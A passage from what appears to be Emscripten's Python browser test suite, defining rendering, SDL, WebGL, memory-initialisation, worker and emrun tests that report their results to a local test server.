self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1']) # multitexture
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'SPLIT_MEMORY=16777216']) # check for uniform4fv slice being valid in split memory
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=' + str(1024*1024*8)])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', reference='htmltest.png')
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'])
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1'])
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1'])
def test_s3tc_crunch(self):
try:
print 'Crunch is located at ' + CRUNCH
except:
return self.skip('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
def test(args):
print args
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
open('text.txt', 'w').write('123')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'] + args, stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1'])
test([])
test(['text.txt']) # also package a non-crunch file
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
try:
print 'Crunch is located at ' + CRUNCH
except:
return self.skip('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1'])
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
Settings.ASM_JS = 1
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print 'passed asm test'
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1'])
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png')
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png')
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_runtimelink(self):
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
Popen([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.js', '-s', 'SIDE_MODULE=1', '-O2']).communicate()
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.js"]'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
Module.print('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print what, status
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
Module.print('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
Module.print('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
Module.print('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
Module.print('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:8888/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
'''
open('pre_main.js', 'w').write(r'''
Module._main = function(){
myJSCallback();
return 0;
};
''')
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_main.js'], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
print '\n', filename, extra_args
print 'mem init, so async, call too early'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1'] + extra_args)
print 'sync startup, call too late'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args)
print 'sync, runtime still alive, so all good'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=1'] + extra_args)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js')], expected='0')
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
def test_module(self):
return self.skip('non-fastcomp is deprecated and fails in 3.5')
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
result = subprocess.check_output([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'])
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = subprocess.check_output([PYTHON, path_from_root('emrun'), '--list_browsers'])
assert 'Traceback' not in result
def test_emrun(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if emscripten_browser is not None:
# If EMSCRIPTEN_BROWSER carried command line arguments to pass to the browser, (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun, so strip them out.
browser_name = shlex.split(emscripten_browser)[0]
args += ['--browser', browser_name]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print out
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1')
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
open('pre.js', 'w').write(r'''
if (typeof Module === 'undefined') Module = eval('(function() { try { return Module || {} } catch(e) { return {} } })()');
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
Module['addRunDependency']('test_run_dependency');
Module['removeRunDependency']('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print opts
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts, expected='0', timeout=20)
# Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html')], expected='0', timeout=20)
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print opts
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-s', 'NO_EXIT_RUNTIME=1'], expected='0', timeout=20)
def test_webgl_context_params(self):
if WINDOWS: return self.skip('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print opts
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1'], expected='0')
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_codemods(self):
for opt_level in [0, 2]:
print 'opt level', opt_level
opts = '-O' + str(opt_level)
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
# now use a shell to remove the browser's fround support
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', '''
Math.fround = null;
var Module = {
'''))
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '--shell-file', 'shell.html', '-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, no browser support, so semantics are like double
# finally, remove fround, patch up fround as the code executes (after polyfilling etc.), to verify that we got rid of it entirely on the client side
fixer = 'python fix.py'
open('fix.py', 'w').write(r'''
import sys
filename = sys.argv[1]
js = open(filename).read()
replaced = js.replace("var Math_fround = Math.fround;", "var Math_fround = Math.fround = function(x) { return 0; }")
assert js != replaced
open(filename, 'w').write(replaced)
''')
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer]) # no fround anyhow
self.btest(path_from_root('tests', 'codemods.cpp'), expected='121378', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer, '-s', 'PRECISE_F32=1']) # proper polyfill was enstated, then it was replaced by the fix so 0 is returned all the time, hence a different result here
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer, '-s', 'PRECISE_F32=2', '--separate-asm']) # we should remove the calls to the polyfill ENTIRELY here, on the clientside, so we should NOT see any calls to fround here, and result should be like double
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print 'asyncify+emterpreter'
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT();
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html']).communicate()
os.mkdir('sub')
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print 'in html'
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html'] + args).communicate()
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
open('src.cpp', 'w').write(self.with_report_result(r'''
#include<stdio.h>
#include<emscripten.h>
int main() {
int result = EM_ASM_INT_V({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT();
return 0;
}
'''))
in_html('200', ['-s', 'FORCE_FILESYSTEM=1'])
def test_glfw3(self):
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3'], expected='1')
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2"], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3"], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['_main'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print opts
opts += ['-s', 'NO_EXIT_RUNTIME=1', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
if isinstance(SPIDERMONKEY_ENGINE, list) and len(SPIDERMONKEY_ENGINE[0]) != 0:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print 'Skipping asm validation check, spidermonkey is not configured'
